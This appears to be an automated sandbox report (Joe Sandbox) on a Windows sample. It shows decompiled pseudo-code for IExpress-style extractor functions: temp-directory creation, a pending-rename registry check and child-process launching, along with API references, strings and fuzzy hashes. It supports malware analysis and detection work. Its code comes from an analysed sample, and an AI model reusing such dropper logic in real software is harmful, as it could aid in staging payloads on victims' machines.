C-Code - Quality: 94%

			E004044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x408004; // 0x7980a54a
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x408a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x409a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00401680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0040171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0040171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0040681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E004067C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0040681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E004067C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00406CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x004044b9
0x004044c4
0x004044cb
0x004044d8
0x004044e4
0x004044eb
0x004044ee
0x004044ef
0x004044ef
0x004044f1
0x004044f7
0x004044f8
0x0040467b
0x004044fe
0x00404509
0x00404518
0x00404525
0x00404562
0x00404568
0x00404568
0x0040456b
0x0040456b
0x0040456d
0x0040456e
0x00404572
0x00404578
0x0040457c
0x004045cb
0x00404607
0x00404607
0x0040460d
0x00404613
0x00404617
0x00000000
0x0040461d
0x00404623
0x00404626
0x00404628
0x00000000
0x00404628
0x004045cd
0x004045cd
0x004045cf
0x004045cf
0x004045d2
0x004045d2
0x004045d4
0x004045d5
0x004045db
0x004045de
0x004045e3
0x004045e9
0x004045ed
0x00000000
0x004045f3
0x004045fd
0x00000000
0x00404602
0x004045ed
0x0040457e
0x0040457e
0x00404580
0x00404580
0x00404583
0x00404583
0x00404585
0x00404586
0x0040458a
0x0040458c
0x0040458f
0x0040458f
0x00404591
0x00404592
0x0040459b
0x0040459e
0x004045a3
0x004045a9
0x004045ad
0x00000000
0x004045af
0x004045af
0x004045bf
0x0040462d
0x00404630
0x0040463d
0x0040464e
0x0040464e
0x0040463f
0x00404640
0x00404647
0x0040464c
0x00000000
0x00000000
0x0040464c
0x00404666
0x0040466d
0x0040466f
0x00404675
0x00404675
0x004045ad
0x00404527
0x0040452e
0x0040453f
0x0040453f
0x00404530
0x00404531
0x00404538
0x0040453d
0x00000000
0x00000000
0x0040453d
0x00404554
0x0040455a
0x0040455a
0x0040455a
0x00404525
0x0040468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
LocalAlloc.KERNEL32(00000040,00000065), ref: 004045A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 004045E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0040460D
MessageBeep.USER32(00000000), ref: 00404630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00404666
LocalFree.KERNEL32(00000000), ref: 0040466F

Part of subcall function 0040681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
Part of subcall function 0040681F: GetSystemMetrics.USER32(0000004A), ref: 004068A7
Part of subcall function 0040681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
Part of subcall function 0040681F: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
Part of subcall function 0040681F: RegCloseKey.ADVAPI32(?), ref: 00406902

Strings

doza2, xrefs: 00404545, 0040465A
LoadString() Error. Could not load string resource., xrefs: 004044E4

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
Instruction ID: f9d95c897c3f9acb34889c8f4230c3a0684cd2a5052bf7c23177ba80834ac1ca
Opcode Fuzzy Hash: c9d5c5b1e490d48041246102af90d95d94e3abacc0a213a657fe916465fb66f7
Instruction Fuzzy Hash: 61510BB1900215AFDB219F28CD48BA77B68EF85304F1045BAFE45B7281DB3ADD15CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004053A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004053A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x408004; // 0x7980a54a
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0040171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00401680(_t32, 0x104, _t20);
					E0040658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00406CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x408a20 = 1;
				goto L5;
			}

0x004053ac
0x004053b3
0x004053b9
0x004053bb
0x004053bd
0x004053bf
0x004053d1
0x004053d6
0x004053e0
0x004053e2
0x004053f5
0x004053fb
0x00405402
0x0040540b
0x00000000
0x00000000
0x00405413
0x00000000
0x00000000
0x00405415
0x00405416
0x00405427
0x0040542a
0x0040542b
0x00405434
0x00405434
0x0040543a
0x0040544c
0x0040544c
0x00405452
0x0040545a
0x00000000
0x00000000
0x0040545e
0x0040545f
0x00000000

APIs

Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405452

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004053B7, 004053E1, 0040541E
IXP, xrefs: 00405419
IXP%03d.TMP, xrefs: 004053C0

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-775753704
Opcode ID: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
Instruction ID: 125cfa7c81adbab0fbf8f7f76c25cee134d25006f7ef051e404a57ef8c01fb33
Opcode Fuzzy Hash: 43f651f3391ef192c497bfbc0c6e30c6af2b5fc786458bd32b7fff1cca5d2d8e
Instruction Fuzzy Hash: F711047170060467E3209F269D49FEF366DEBC1315F00013ABA46F22E0CE7889568AAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E004024E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00402572
0x00402573
0x00402575
0x00402578
0x0040257d
0x00402627
0x00402583
0x00402586
0x00402589
0x004025eb
0x00402607
0x00000000
0x00402609
0x0040261a
0x00000000
0x0040261a
0x00000000
0x0040258b
0x0040258b
0x0040259e
0x004025b2
0x004025ba
0x004025cb
0x004025d1
0x004025d6
0x004025da
0x004025dd
0x004025dd
0x004025e3
0x004025e3
0x004025e3
0x0040258b
0x00402589
0x0040262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025CB
RegCloseKey.KERNELBASE(?,?,00401ED3,00000001,00000000,?,?,00404137,?,00404096), ref: 004025DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00404096,00404096,?,00401ED3,00000001,00000000,?,?,00404137,?), ref: 004025FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00404096,00000000,00000000,00000000,00000000,?,00401ED3,00000001,00000000), ref: 0040261A

Strings

PendingFileRenameOperations, xrefs: 004025C3
System\CurrentControlSet\Control\Session Manager, xrefs: 004025A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 004025F5

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
Instruction ID: 778f9ec0fea580b62285155236816de8bc499f761098cae054ab7690dd904a70
Opcode Fuzzy Hash: c2d3288791866de7610645414065337d80aaeaca1c7ddf0c8aceb1b598e70452
Instruction Fuzzy Hash: 31118235902228BBDF209B919E0DDFB7E7CDF017A5F104076B808B21C0D6B44E48D6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00406A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00407155();
				_push(0x58);
				_push(0x4072b8);
				E00407208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x4088b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x4088b0; // 0x2
						if(__eflags != 0) {
							 *0x4081e4 = _t58;
							goto L13;
						} else {
							 *0x4088b0 = _t58;
							__eflags = E00406C3F(0x4010b8, 0x4010c4);
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00406FF4();
						L13:
						_t68 =  *0x4088b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x4010b4);
							_push(0x4010ac);
							L00407202();
							 *0x4088b0 = 2;
						}
						if(_t53 == 0) {
							 *0x4088ac = 0;
						}
						_t71 =  *0x4088b4;
						if( *0x4088b4 != 0 && E00407060(_t71, 0x4088b4) != 0) {
							_t60 =  *0x4088b4; // 0x0
							 *0x40a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76235b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00402BFB(0x400000, 0, _t59); // executed
							 *0x4081e0 = _t30;
							__eflags =  *0x4081f8;
							if( *0x4081f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x4081e4;
							if( *0x4081e4 == 0) {
								__imp___cexit();
								_t30 =  *0x4081e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0040724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x00406a60
0x00406a6a
0x00406a6c
0x00406a71
0x00406a78
0x00406a7f
0x00406a85
0x00406a8e
0x00406a91
0x00406a93
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa6
0x00406ab4
0x00000000
0x00406aa8
0x00406aaa
0x00406aab
0x00406aab
0x00406abf
0x00406abf
0x00406ac5
0x00406ad1
0x00406ad7
0x00406b05
0x00000000
0x00406ad9
0x00406ad9
0x00406af0
0x00406af2
0x00000000
0x00406af4
0x00406af4
0x00406afb
0x00406afb
0x00406af2
0x00406ac7
0x00406ac7
0x00406ac9
0x00406b0b
0x00406b0b
0x00406b11
0x00406b13
0x00406b18
0x00406b1d
0x00406b24
0x00406b24
0x00406b30
0x00406b39
0x00406b39
0x00406b3b
0x00406b42
0x00406b57
0x00406b5f
0x00406b65
0x00406b65
0x00406b67
0x00406b6c
0x00406b6e
0x00406b71
0x00406b74
0x00406b74
0x00406b79
0x00000000
0x00000000
0x00406b7d
0x00406b81
0x00000000
0x00000000
0x00406b83
0x00406b8c
0x00406b8d
0x00406b90
0x00406b90
0x00406b83
0x00406b81
0x00406b94
0x00406b98
0x00406ba2
0x00406b9a
0x00406b9a
0x00406b9a
0x00406ba3
0x00406bab
0x00406bb0
0x00406bb5
0x00406bbc
0x00406bbf
0x00000000
0x00406bbf
0x00406c1e
0x00406c25
0x00406c27
0x00406c2d
0x00406c2d
0x00406c32
0x00000000
0x00406bc5
0x00406bc5
0x00406bc8
0x00406bcc
0x00406bce
0x00406bce
0x00406bd1
0x00406bd3
0x00406bd3
0x00406bd6
0x00406bda
0x00406be1
0x00406be3
0x00406be5
0x00406be5
0x00406be6
0x00406be6
0x00406be9
0x00406bea
0x00406bea
0x00406b74
0x00406c39
0x00406c3e
0x00406c3e
0x00406abe
0x00406abe
0x00000000

APIs

Part of subcall function 00407155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
Part of subcall function 00407155: GetCurrentProcessId.KERNEL32 ref: 00407191
Part of subcall function 00407155: GetCurrentThreadId.KERNEL32 ref: 0040719A
Part of subcall function 00407155: GetTickCount.KERNEL32 ref: 004071A3
Part of subcall function 00407155: QueryPerformanceCounter.KERNEL32(?), ref: 004071B8

GetStartupInfoW.KERNEL32(?,004072B8,00000058), ref: 00406A7F
Sleep.KERNEL32(000003E8), ref: 00406AB4
_amsg_exit.MSVCRT ref: 00406AC9
_initterm.MSVCRT ref: 00406B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 00406B49
exit.KERNELBASE ref: 00406BBF
_ismbblead.MSVCRT ref: 00406BDA

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
Instruction ID: 9f93abb3083409938a6c880a1f3258a823be3681a554c64202715cd4aa4e3ace
Opcode Fuzzy Hash: 23f8bd3fb82f9f3920aac8045ba76bf5d17e43c9f1484d607dcc2f0c82561cbd
Instruction Fuzzy Hash: 2741C4719443258BEB21AB689A0476B77F4AB44720F25403FE883F73D1CF7C58618A9E

Uniqueness

Uniqueness Score: -1.00%

Function 004058C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004058C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00401680(_t20, _t36, _t33);
					E0040658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x409124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x409124 = E00406285();
					_t14 = 0;
				}
				return _t14;
			}

0x004058cd
0x004058d1
0x004058d3
0x004058d5
0x004058d8
0x004058d8
0x004058da
0x004058db
0x004058e1
0x004058ed
0x004058f1
0x0040591e
0x0040592c
0x00405943
0x0040594a
0x0040594d
0x00405953
0x00405959
0x00000000
0x0040595b
0x0040595c
0x00405963
0x0040596c
0x00000000
0x00405972
0x00405974
0x0040597a
0x0040597a
0x0040596c
0x004058f3
0x00405901
0x00405906
0x0040590b
0x00405910
0x00405910
0x00405918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004058E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405943
LocalFree.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040594D
CloseHandle.KERNEL32(00000000,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00405534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405963

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004058CD, 004058CF, 00405919, 00405962
TMP4351$.TMP, xrefs: 00405923

Memory Dump Source

Source File: 00000000.00000002.391523288.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.391523288.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_d3HccaLUT7.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-1664176527
Opcode ID: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
Instruction ID: b28bd581754d51eb60e6e201e72a6d4170e8326a15d096e72f08d1eb5dd15189
Opcode Fuzzy Hash: 19bced661d23b48288e7b252ec9bc7e0d1aaf31755be21c792b5c023435c06d0
Instruction Fuzzy Hash: FA1126B16002106BD7242F7A6C4DB9B7E9DDF85364B10463AB90AF32D1CA788C2586AC

Uniqueness

Uniqueness Score: -1.00%

Function 00403FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x408004; // 0x7980a54a
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00406CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E004044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x408a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x409a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x409a2c = _t44;
						}
					}
				}
				E0040411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x409a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00403fef
0x00403ffa
0x00404001
0x00404008
0x0040400a
0x0040400b
0x00404010
0x0040410a
0x0040411a
0x0040411a
0x0040401c
0x0040401d
0x0040401e
0x0040401f
0x00404033
0x0040403b
0x004040ca
0x004040e9
0x004040f8
0x00404101
0x00404106
0x00404106
0x00404108
0x00404108
0x00000000
0x00404108
0x00404049
0x0040405c
0x00404062
0x00404068
